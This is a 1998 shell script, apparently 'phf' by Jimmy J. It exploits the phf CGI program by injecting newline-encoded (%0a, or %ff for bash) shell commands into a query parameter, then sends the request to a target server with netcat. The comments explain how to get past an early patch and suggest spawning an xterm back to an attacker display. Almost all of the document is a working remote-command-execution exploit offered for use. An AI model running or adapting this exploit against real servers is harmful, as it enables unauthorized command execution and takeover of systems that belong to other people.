#!/bin/sh
#
# phf '98 by Jimmy J
#
# Required:
#  nc (netcat) ftp://ftp.avian.org/src/hacks/nc110.tgz
#
# Example:
#  phf www.lame.net uname%20-a
#  phf www1.provider.co.uk:31337 "ps aux"
#
#  phf -p need.clues.com:8080/somewhere/else/phf
#
# Problem:
# The phf cgi does not strip out newlines in $QUERY_STRING allowing
# embedded shell commands in a ph database query.
#
# Impact:
# An attacker can remotely execute commands on the host machine under the
# uid of the httpd process.
#
# Notes: 
# The -p switch tries %ff rather than %0a if /bin/sh is bash on the target
# utilising the bash 255 hole and foiling an early, half-assed patch.
#
# id is executed if no command is specified.
#
# Space works if you surround the command in quotes.  eg; 'df -k'
#
# %20 is space.  %0a is newline.  Altavista for ascii
# lists.  phf filters > so no .rhosts.
#
# May I remind X kiddies among you that DISPLAY=x.x.x.x; xterm -ut &
# can be very useful after an xhost + locally.
#
# I wrote this mainly for personal amusement but phf is one of those things
# that lives forever so someone will find a use for this.
#
# Be nice.
#

usage() {
	echo "Usage: `basename $0` [-p] <host>[:port/cgi-bin/phf] [command]" 1>&2
	exit 1
}

port=80

if [ "$1" = "-p" ]; then
	victim=$2
	command="$3"
	escape=%ff
else
	victim=$1
	command="$2"
	escape=%0a
fi

if [ -z "$victim" ]; then
	usage
fi

phf=/cgi-bin/phf

if echo $victim | grep ":" 1>/dev/null; then
	if echo $victim | grep "/" 1>/dev/null; then
		port="`echo $victim | cut -f1 -d "/" | cut -f2 -d ":"`"
		phf="/`echo $victim | cut -f2- -d "/"`"
		victim=`echo $victim | cut -f1 -d ":"`
	else
		port=`echo $victim | cut -f2 -d ":"`
		victim=`echo $victim | cut -f1 -d ":"`
	fi
fi

if [ -z "$command" ]; then
	command=id
fi

if echo "$command" | grep " " 1>/dev/null; then
	command=`echo "$command" | sed s/" "/%20/g`
fi

echo "Trying $victim:$port$phf... [$escape] ["$command"]"
echo "GET $phf?Jserver=$victim$escape"$command"$escape&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0
Host: $victim
Accept: text/html, text/plain, application/x-wais-source, */*
User-Agent: Lynx/2.5  libwww/2.14
Referer: http://$victim/

" | nc -v $victim $port
